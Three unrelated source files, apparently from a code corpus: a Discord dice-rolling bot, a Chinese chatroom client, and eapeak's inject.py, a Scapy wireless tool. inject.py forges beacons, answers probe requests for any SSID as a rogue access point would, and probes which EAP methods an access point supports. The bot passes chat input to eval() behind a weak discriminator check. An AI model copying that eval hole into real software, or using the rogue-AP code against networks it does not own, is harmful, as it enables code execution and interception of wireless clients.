    "Ḣ̥̪̗͙͚͉͓͔̎ͯ̃ͫͨͫ͜͠ͅẼ̖̼͍̞̘̠̫͛ ̳̤͗͛͆̉̈́̆̈͝C͚̱̮̘̆͂̌ͧŎ̧̟̞̩̳̝̘̯̂̂̀͐̆̏͞M̨̼͙̫̿͐̒̀̓̿ͅE͗̆͗͆̽͏͏̖̜̱͍̝̙ͅS͙̯͍̩̱̪̞ͦͣͫ͌̍ͦͤ͠ͅ"
GAME_STR = "1dbutter | .help"
# NOTE(review): authorization compares only the 4-digit discriminator,
# which is NOT unique across Discord users -- consider using the user ID.
MASTER = "YOUR DISCORD DISCRIMINATOR HERE"
banned_users = []
COMMAND_TIMEOUT = 5          # seconds before a dice evaluation is killed
MAX_MESSAGE_LENGTH = 2000    # Discord's hard message-size limit

client = discord.Client()
executor = ProcessPoolExecutor()


def run_command(*args, **kwargs):
    """Subprocess entry point: run *fn* and ship its result back over *conn*."""
    fn = kwargs.pop('fn')
    conn = kwargs.pop('conn')
    conn.send(fn(*args, **kwargs))
    conn.close()


def do_command(fn, *args, **kwargs):
    """Run *fn* in a fresh process with a hard timeout.

    Returns the function result, or an error string on timeout/failure.
    The fresh process guarantees runaway expressions can be terminated.
    """
    parent_conn, child_conn = Pipe()
    kwargs['conn'] = child_conn
    kwargs['fn'] = fn
    p = Process(target=run_command, args=args, kwargs=kwargs)
    p.start()
    p.join(COMMAND_TIMEOUT)
    if p.is_alive():
        p.terminate()
        return "Request timed out"
    try:
        return parent_conn.recv()
    except Exception:
        # Child died without sending a result.
        return "Error running command"


async def invoke_command(fn, *args, **kwargs):
    """Run *fn* through the subprocess sandbox and return its result.

    NOTE(review): ``.result()`` blocks the event loop for up to
    COMMAND_TIMEOUT seconds; consider ``await loop.run_in_executor(...)``.
    """
    global executor
    result = executor.submit(do_command, fn, *args, **kwargs).result()
    return result


@client.event
async def on_ready():
    print('Logged in as')
    print(client.user.name)
    print(client.user.id)
    print('------')
    load_decks()
    await client.change_presence(game=discord.Game(name=GAME_STR))


@client.event
async def on_message(message):
    """Dispatch chat commands.  Prefix matching, first match wins."""
    if str(message.author.discriminator) in banned_users:
        return
    elif message.content.startswith('.roll'):
        dice_str = message.content[6:]
        if dice_str == '0d0':
            await client.send_message(message.channel, "{} {}".format(message.author.mention, ZALGO_STR))
        else:
            result = await invoke_command(evaluate_dice, dice_str)
            if result is None:
                return
            response = "{} Result: {}".format(message.author.mention, result)
            if len(response) < MAX_MESSAGE_LENGTH:
                await client.send_message(message.channel, response)
            else:
                await client.send_message(message.channel, "{} Response too long".format(message.author.mention))
    elif message.content.startswith('.count'):
        dice_str = message.content[7:]
        if dice_str == '0d0':
            await client.send_message(message.channel, "{} {}".format(message.author.mention, ZALGO_STR))
        else:
            result = await invoke_command(roll_count, *map(int, dice_str.split('d')))
            response = "{} Result: {}".format(message.author.mention, result)
            if len(response) < MAX_MESSAGE_LENGTH:
                await client.send_message(message.channel, response)
            else:
                await client.send_message(message.channel, "{} Response too long".format(message.author.mention))
    elif message.content.startswith('.eval'):
        # SECURITY: eval() of chat input -- gated on MASTER, but the
        # discriminator check is weak (see MASTER note above).
        if str(message.author.discriminator) == MASTER:
            await client.send_message(message.channel, "{} {}".format(
                message.author.mention, eval(message.content[6:]))
            )
        else:
            await client.send_message(message.channel, "{} You're not the boss of me!".format(message.author.mention))
    elif message.content.startswith('.setgame'):
        if str(message.author.discriminator) == MASTER:
            await client.change_presence(game=discord.Game(name=message.content[9:]))
        else:
            await client.send_message(message.channel, "{} You're not the boss of me!".format(message.author.mention))
    elif message.content.startswith('.help'):
        # Help is sent via DM to avoid channel spam.
        await client.send_message(message.author, HELP_STR)
    elif message.content.startswith('.init'):
        # Matches the documented `.initdeck` command via the `.init` prefix.
        deck_id, use_22 = message.content.split()[1:3]
        use_22 = int(use_22)
        init_deck(deck_id, use_22)
        await client.send_message(message.channel, "{} {}-card deck with ID {} initialized.".format(
            message.author.mention, 22 if use_22 else 13, deck_id)
        )
    elif message.content.startswith('.draw'):
        deck_id = message.content.split()[1]
        card = draw(deck_id)
        await client.send_message(message.channel, "{} Your card is: {}".format(message.author.mention, card))
    elif message.content.startswith('.butter'):
        await client.send_message(message.channel, "{} https://i.imgur.com/lue3ZfD.png".format(message.author.mention))


def main(client_secret, master):
    """Configure the MASTER override and run the bot (blocks forever)."""
    global client, MASTER
    MASTER = master
    client.run(client_secret)


if __name__ == '__main__':
    if len(sys.argv) < 3:
        # Bug fix: previously this printed usage and then called main()
        # anyway, crashing with IndexError on missing argv entries.
        print("Usage: tymora <client secret> <master discriminator>")
        sys.exit(1)
    main(sys.argv[1], sys.argv[2])
udp_c_chatroom.py
""" author: Lewizo email: 615905244@qq.com env: Python3.8 socket udp & tcp & multiprocessing """ from socket import * from multiprocessing import * # import chatroom_ui import sys def menu(us): print(''' =============== 聊天室菜单 =============== 1 登录 2 注册账号 3 更改账号昵称 4 修改密码 5 更改头像(暂未开放) 6 上传共享文件 7 下载共享文件 8 查看共享文件 9 在线词典 0 退出聊天室 ======================================== ''') while True: select = input("请选择 >>") if select == "1": name = log_in(us) return name if select == "2": regist(us) if select == "3": change_name(us) if select == "4": pass # change_password(us) if select == "5": pass # change_image(us) if select == "6": put_file() if select == "7": get_file() if select == "8": look_file() if select == "9": find_word() if select == "0": sys.exit("退出") def log_in(us): while True: name = input("输入昵称:") password = input("输入密码:") msg = "L " + name + " " + password us.sendto(msg.encode(), ('127.0.0.1', 2048)) data, addr = us.recvfrom(1024) print(data.decode()) if data.decode() == "进入聊天室": return name def regist(us): while True: name = input("输入昵称:") password = input("输入密码:") msg = "R " + name + " " + password us.sendto(msg.encode(), ('127.0.0.1', 2048)) data, addr = us.recvfrom(1024) print(data.decode(), end="") if data.decode() == "创建成功!": break def change_name(us): while True: name = input("输入需要修改的昵称:") password = input("输入密码:") newname = input("输入新的昵称:") msg = "E " + name + " " + password + " " + newname us.sendto(msg.encode(), ('127.0.0.1', 2048)) data, addr = us.recvfrom(1024) print(data.decode(), end="") if data.decode() == "修改成功": break def send_message(name, us): while True: try: word = input(name + ">>") except KeyboardInterrupt: word = "exit" if word == "exit": msg = "Q " + name us.sendto(msg.encode(), ('127.0.0.1', 2048)) sys.exit("退出聊天室") msg = "C " + name + " " + word us.sendto(msg.encode(), ('127.0.0.1', 2048)) def get_message(name, us): while True: data, addr = us.recvfrom(1024) print("\n" + data.decode() + "\n" + name + ">>", end="") def put_file(): ts = 
socket() ts.connect(('localhost', 2048)) name = input("输入要上传的文件名称:") msg = "P " + name ts.send(msg.encode()) f = open('/home/lewizo/PycharmProjects/chatroom/client/' + name, 'rb') while True: data = f.read(1024) if not data: print("上传完毕") ts.send("# ".encode()) break ts.send(data) f.close() ts.close() def get_file(): ts = socket() ts.connect(('localhost', 2048)) name = input("输入要下载的文件名称:") msg = "G " + name ts.send(msg.encode()) f = open('/home/lewizo/PycharmProjects/chatroom/client/' + name, 'wb') while True: data = ts.recv(1024) if data == "上传完毕".encode(): print(data.decode()) break f.write(data) f.close() ts.close() def look_file(): ts = socket() ts.connect(('localhost', 2048)) ts.send("L ".encode()) list_file = ts.recv(1024) print(list_file.decode()) def find_word(): ts = socket() ts.connect(('localhost', 2048)) while True: try: word = input("输入单词:") except KeyboardInterrupt: ts.send("w exit".encode()) break if word == "exit": ts.send("w exit".encode()) break msg = "W " + word ts.send(msg.encode()) mean = ts.recv(1024) print(mean.decode()) def main(): us = socket(AF_INET, SOCK_DGRAM) name = menu(us) p_get = Process(target=get_message, args=(name, us), daemon=True) p_get.start() send_message(name, us) us.close() if __name__ == '__main__': main()
inject.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # # lib/eapeak/inject.py # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of the project nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
#
# Python 2 module (uses the `Queue` stdlib name and byte-string literals
# for raw 802.11 information elements).
import Queue
from random import randint
from struct import pack, unpack
import threading
import time
# external imports
from scapy.layers.dot11 import RadioTap, Dot11, Dot11Beacon, Dot11Elt, Dot11Auth, Dot11AssoReq, Dot11AssoResp, Dot11ProbeReq, Dot11Disas, Dot11QoS, Dot11ProbeResp
from scapy.layers.eap import EAPOL
from scapy.layers.l2 import LLC, SNAP
from scapy.sendrecv import sniff, sendp
# project imports
from eapeak.common import get_bssid, get_source, get_destination, __version__
from eapeak.parse import parse_rsn_data, build_rsn_data
from eapeak.scapylayers.l2 import LEAP, PEAP, EAP  # pylint: disable=unused-import
from ipfunc import getHwAddr

RESPONSE_TIMEOUT = 1.5  # Time to wait for a response (seconds)
# Privacy modes accepted by set_privacy()/send_beacon_ex().
PRIVACY_NONE = 0
PRIVACY_WEP = 1
PRIVACY_WPA = 2
EAP_MAX_TRIES = 3  # retransmission attempts per EAP exchange step
# ANSI-colored console status prefixes.
GOOD = '\033[1;32m[+]\033[1;m '
STATUS = '\033[1;34m[*]\033[1;m '
ERROR = '\033[1;31m[-]\033[1;m '


class SSIDBroadcaster(threading.Thread):
    """
    This object is a thread-friendly SSID broadcaster

    It's meant to be controlled by the Wireless State Machine.
    It repeatedly transmits a beacon frame (built by set_privacy) for the
    configured ESSID/BSSID until __shutdown__ is set.
    """
    def __init__(self, interface, essid, bssid=None):
        # interface: monitor-mode interface to inject on.
        # essid: network name advertised in the beacon.
        # bssid: AP MAC; defaults to the interface's own hardware address.
        threading.Thread.__init__(self)
        self.interface = interface
        self.essid = essid
        if not bssid:
            bssid = getHwAddr(interface)
        self.bssid = bssid.lower()
        self.broadcast_interval = 0.15  # seconds between beacons
        self.channel = "\x06"           # raw DSset IE payload (channel 6)
        self.set_privacy(PRIVACY_NONE)  # builds self.beacon
        self.sequence = randint(1200, 2000)  # random start avoids collisions
        self.__shutdown__ = False

    def __fixSC__(self, fragment=0):
        """
        This is a reserved method to return the sequence number in a
        way that is not skewed by a bug in how the SC field is packed in
        Scapy.
        """
        # Increment with wrap at the 12-bit sequence-number limit.
        if self.sequence >= 0xFFF:
            self.sequence = 1
        else:
            self.sequence += 1
        # Pack sequence+fragment, then byte-swap to counter Scapy's SC bug.
        SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4)
        return unpack('<H', pack('>H', SC))[0]

    def run(self):
        """
        This is the thread routine that broadcasts the SSID.
        """
        while not self.__shutdown__:
            self.beacon.getlayer(Dot11).SC = self.__fixSC__()
            sendp(self.beacon, iface=self.interface, verbose=False)
            time.sleep(self.broadcast_interval)

    def set_privacy(self, value):
        """
        Configure the privacy settings for None, WEP, and WPA.
        Rebuilds self.beacon; the WPA variant adds vendor-specific (ID 221)
        information elements carrying the WPA/WMM parameters.
        """
        if value == PRIVACY_NONE:
            self.beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11Beacon(cap='ESS+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=self.essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif value == PRIVACY_WEP:
            self.beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=self.essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif value == PRIVACY_WPA:
            self.beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=self.essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
                Dot11Elt(ID=42, info="\x00")/
                Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
            )

    def send_beacon(self):
        """
        Convenience function for sending beacons without starting a thread
        """
        self.beacon.getlayer(Dot11).SC = self.__fixSC__()
        sendp(self.beacon, iface=self.interface, verbose=False)

    @staticmethod
    def send_beacon_ex(essid, interface, privacy=PRIVACY_NONE, bssid=None, channel=6):
        """
        Convenience function for sending beacons without a thread or
        creating an instance.  Accepts the PRIVACY_* constants or the
        strings 'none'/'wep'/'wpa' (any case).
        """
        if not bssid:
            bssid = getHwAddr(interface)
        channel = chr(channel)
        sequence = randint(1200, 2000)
        if privacy in [PRIVACY_NONE, 'none', 'NONE']:
            beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
                Dot11Beacon(cap='ESS+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif privacy in [PRIVACY_WEP, 'wep', 'WEP']:
            beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
                Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']:
            beacon = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
                Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info=essid)/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=channel)/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
                Dot11Elt(ID=42, info="\x00")/
                Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
            )
        else:
            raise Exception('Invalid privacy setting')
        sendp(beacon, iface=interface, verbose=False)


class ClientListener(threading.Thread):
    """
    This object is a thread-friendly listener for Client connection
    attempts.  The backlog corresponds to the size of the queue, if the
    queue is full because the items are not being handled fast enough
    then new association requests will be dropped and lost.
    """
    def __init__(self, interface, backlog, essid=None, bssid=None):
        # essid=None means answer probe requests for ANY ssid.
        threading.Thread.__init__(self)
        self.interface = interface
        self.backlog = backlog
        self.essid = essid
        if not bssid:
            bssid = getHwAddr(interface)
        self.bssid = bssid.lower()
        self.lastpacket = None
        # Bounded queue of client MACs awaiting handling; overflow is dropped.
        self.client_queue = Queue.Queue(self.backlog)
        self.channel = "\x06"
        self.sequence = randint(1200, 2000)
        self.__shutdown__ = False

    def __fixSC__(self, fragment=0):
        """
        This is a reserved method to return the sequence number in a
        way that is not skewed by a bug in how the SC field is packed in
        Scapy.
        """
        if self.sequence >= 0xFFF:
            self.sequence = 1
        else:
            self.sequence += 1
        SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4)  # bit shifts FTW!
        return unpack('<H', pack('>H', SC))[0]

    def __stopfilter__(self, packet):
        """
        This is the stop filter for Scapy to be used to check if the
        packet was sent to EAPeak.
        """
        # Auth/AssocReq must be addressed to our BSSID (and not be our own
        # transmissions); any probe request is accepted.
        if packet.haslayer(Dot11Auth) or packet.haslayer(Dot11AssoReq):
            if get_bssid(packet) == self.bssid and get_source(packet) != self.bssid:
                self.lastpacket = packet
                return True
            return False
        elif packet.haslayer(Dot11ProbeReq):
            self.lastpacket = packet
            return True
        return False

    def set_privacy(self, value):
        """
        Configure the privacy settings for None, WEP, and WPA.
        Builds self.probe_response_template; run() fills in addr1/SSID.

        NOTE(review): the capability strings for PRIVACY_NONE and
        PRIVACY_WEP appear swapped -- the NONE template advertises
        'privacy' and the WEP one does not.  Preserved as-is; confirm
        against the intended behavior before fixing.
        """
        if value == PRIVACY_NONE:
            self.probe_response_template = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info='')/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif value == PRIVACY_WEP:
            self.probe_response_template = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11ProbeResp(cap='ESS+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info='')/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=42, info="\x04")/
                Dot11Elt(ID=47, info="\x04")/
                Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )
        elif value == PRIVACY_WPA:
            self.probe_response_template = (
                RadioTap()/
                Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/
                Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/
                Dot11Elt(ID="SSID", info='')/
                Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
                Dot11Elt(ID="DSset", info=self.channel)/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
                Dot11Elt(ID=42, info="\x00")/
                Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
                Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
            )

    def run(self):
        """
        This is the thread routine that handles probe requests and sends
        probe responses when appropriate.  Auth/AssocReq sources are
        queued for the state machine to handle.
        """
        while not self.__shutdown__:
            sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__)
            if self.lastpacket:
                if self.lastpacket.haslayer(Dot11ProbeReq):
                    # Walk the IE chain for the SSID element (ID 0).
                    ssid = None
                    tmp = self.lastpacket.getlayer(Dot11ProbeReq)
                    while tmp:
                        tmp = tmp.payload
                        if tmp.fields['ID'] == 0:
                            ssid = tmp.info
                            break
                    if ssid is None:
                        continue
                    elif ssid == '' and self.essid:
                        # Broadcast probe: answer with our configured ESSID.
                        ssid = self.essid
                    if self.essid is None or self.essid == ssid:
                        self.probe_response_template.getlayer(Dot11).addr1 = get_source(self.lastpacket)
                        self.probe_response_template.getlayer(Dot11Elt).info = ssid
                        sendp(self.probe_response_template, iface=self.interface, verbose=False)
                    self.lastpacket = None
                    continue
                # Auth/AssocReq: hand the client MAC to the consumer; drop
                # silently when the backlog queue is full.
                clientMAC = get_source(self.lastpacket)
                if not self.client_queue.full():
                    self.client_queue.put(clientMAC, False)
                self.lastpacket = None
                continue


class WirelessStateMachine:
    """
    This provides a psuedo-socket like object that provides a stack for
    Dot11 communications using Scapy.

    Remember: States Are For Smashing
    """
    def __init__(self, interface, bssid, source_mac=None, dest_mac=None):
        """
        You must specify a BSSID and a Local MAC address because the
        entire point of this code is to facilitate stateful connections.
        """
        if not source_mac:
            source_mac = getHwAddr(interface)
        if not dest_mac:
            dest_mac = bssid
        self.interface = interface
        self.bssid = bssid.lower()
        self.source_mac = source_mac.lower()
        self.dest_mac = dest_mac.lower()
        self.connected = False  # connected / associated
        self.__shutdown__ = False
        self.sequence = randint(1200, 2000)
        self.lastpacket = None
        self.timeout = RESPONSE_TIMEOUT

    def __del__(self):
        self.shutdown()
        self.close()

    def __fixSC__(self, fragment=0):
        """
        This is a reserved method to return the sequence number in a
        way that is not skewed by a bug in how the SC field is packed in
        Scapy.

        NOTE(review): unlike the broadcaster/listener variants, this one
        does NOT increment self.sequence; callers bump it themselves.
        """
        SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4)
        return unpack('<H', pack('>H', SC))[0]

    def __stopfilter__(self, packet):
        """
        This is the stop filter for Scapy to be used to check if the
        packet was sent to this WirelessStateMachine instance.
        """
        if get_destination(packet) == self.source_mac and get_bssid(packet) == self.bssid:  # and real_source == self.dest_mac:
            self.lastpacket = packet
            return True
        self.lastpacket = None
        return False

    def __thread_sniff__(self):
        """
        Sniff function threaded to start before packets are sent
        """
        sniff(iface=self.interface, stop_filter=self.__stopfilter__, timeout=RESPONSE_TIMEOUT)

    def __thread_sendp__(self, payload):
        """
        Sendp function used for opening thread, sending packets, and
        closing thread.  The short sleep lets the sniffer start before the
        frame goes out so the response is not missed.
        """
        quick_sniff = threading.Thread(target=self.__thread_sniff__)
        quick_sniff.start()
        time.sleep(0.1)
        sendp(payload, iface=self.interface, verbose=False)
        quick_sniff.join()

    def connect(self, essid, rsnInfo=''):
        """
        Connect/Associate with an access point.

        errDict = {
            -1:"Already Connected",
            0:"No Error",
            1:"Failed To Get Probe Response",
            2:"Failed To Get Authentication Response",
            3:"Failed To Get Association Response",
            4:"Authentication Request Received Fail Response",
            5:"Association Request Received Fail Response"
        }
        """
        # Dot11 authentication exchange (open system, seqnum=1).
        payload = (
            RadioTap()/
            Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac)/
            Dot11Auth(seqnum=1)
        )
        self.__thread_sendp__(payload)
        if rsnInfo is None:  # None explicitly means go get it, leave it '' to proceed with out it
            rsnInfo = self.get_rsn_information(essid)
        if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth):
            return 2
        if self.lastpacket.getlayer(Dot11Auth).status != 0:
            return 4
        # Dot11 Association Request
        payload = (
            RadioTap()/
            Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=0)/
            Dot11AssoReq(cap='ESS+short-preamble+short-slot', listen_interval=10)/
            Dot11Elt(ID=0, info=essid)/
            Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/
            Dot11Elt(ID=50, info='\x0c\x12\x18\x60')/
            rsnInfo
        )
        self.__thread_sendp__(payload)
        if self.lastpacket is None or not self.lastpacket.haslayer(Dot11AssoResp):
            return 3
        if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
            return 5
        self.connected = True
        self.sequence = 0  # restart data-frame sequence numbering
        return 0

    def close(self):
        """
        Disassociate from the access point.  This does not verify that
        the AP received the message and should be considered a
        best-effort attempt (the disassociation frame is deliberately
        sent twice).

        errDict = {
            -1:"Not Connected",
            0:"No Error"
        }
        """
        if not self.connected:
            return -1
        sendp(
            RadioTap()/
            Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12)/
            Dot11Disas(reason=3),
            iface=self.interface, verbose=False
        )
        sendp(
            RadioTap()/
            Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12)/
            Dot11Disas(reason=3),
            iface=self.interface, verbose=False
        )
        self.connected = False
        return 0

    def get_rsn_information(self, essid):
        """Probe the AP for its RSN IE (ID 48) and return it re-serialized
        (b'\\x30' + length + data), '' when absent, or None on no response."""
        rsnInfo = None
        sendp(
            RadioTap()/
            Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=4)/
            Dot11ProbeReq()/
            Dot11Elt(ID=0, info=essid)/
            Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/
            Dot11Elt(ID=50, info='\x0c\x12\x18\x60'),
            iface=self.interface, verbose=False
        )
        self.sequence += 1
        sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__)
        if self.lastpacket is None or not self.lastpacket.haslayer(Dot11ProbeResp):
            return None
        probeResp = self.lastpacket.getlayer(Dot11ProbeResp)
        # Walk the IE chain looking for the RSN element.
        tmp = probeResp.getlayer(Dot11Elt)
        while tmp:
            if tmp.fields.get('ID') == 48:
                rsnInfo = tmp
                break
            else:
                tmp = tmp.payload
        if rsnInfo is None:
            rsnInfo = ''  # Did not find rsnInfo in probe response.
        else:
            # Round-trip through the parser to normalize the data.
            rsnInfo = build_rsn_data(parse_rsn_data(rsnInfo.info))
            rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo
        return rsnInfo

    def recv(self, bufferlen=0):
        """
        Read a frame and return the information above the Dot11 layer.
        (bufferlen is accepted for socket-API parity but unused.)
        """
        sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__)
        if self.lastpacket:
            return self.lastpacket
        else:
            return None

    def send(self, data, dot11_type=2, dot11_subtype=8, FCfield=0x02, raw=True):
        """
        Send a frame, if raw, insert the data above the Dot11QoS layer.

        NOTE(review): as written, raw=True attaches *data* directly to the
        Dot11 header and raw=False inserts a Dot11QoS layer first -- the
        opposite of what the docstring implies; confirm intended semantics.
        """
        frame = RadioTap()/Dot11(FCfield=FCfield, addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=dot11_type, subtype=dot11_subtype)
        if raw:
            frame = frame/data
        else:
            frame = frame/Dot11QoS()/data
        sendp(frame, iface=self.interface, verbose=False)
        self.sequence += 1

    def shutdown(self):
        """
        Shutdown and disassociate from the AP.
        """
        if self.connected:
            self.close()
        self.__shutdown__ = True


class WirelessStateMachineEAP(WirelessStateMachine):
    """
    This is to keep the EAP functionality seperate so the core State-
    Machine can be repurposed for other projects.
    """
    def check_eap_type(self, essid, eaptype, outer_identity='user', eapol_start=False, rsnInfo=''):
        """
        Check that an eaptype is supported.

        errDict = {
            0:"supported",
            1:"not supported",
            2:"could not determine",
            3:"identity rejected"
        }

        Flow: (optional) EAPOL-Start to elicit an Identity request, then an
        EAP Identity response, then a Legacy-NAK proposing *eaptype*; each
        step is retried up to EAP_MAX_TRIES times, using the loop index as
        an exhausted-retries sentinel (i == 2 after a full loop).
        """
        eapid = randint(1, 254)
        if eapol_start:
            eapol_start_request = (
                RadioTap()/
                Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/
                Dot11QoS()/
                LLC(dsap=170, ssap=170, ctrl=3)/
                SNAP(code=0x888e)/
                EAPOL(version=1, type=1)
            )
            self.sequence += 1
            i = 0
            for i in range(0, EAP_MAX_TRIES):
                self.__thread_sendp__(eapol_start_request)
                if not self.lastpacket is None:
                    if self.lastpacket.haslayer('EAP'):
                        fields = self.lastpacket.getlayer('EAP').fields
                        # Expect an EAP Request (code 1) of type Identity (1);
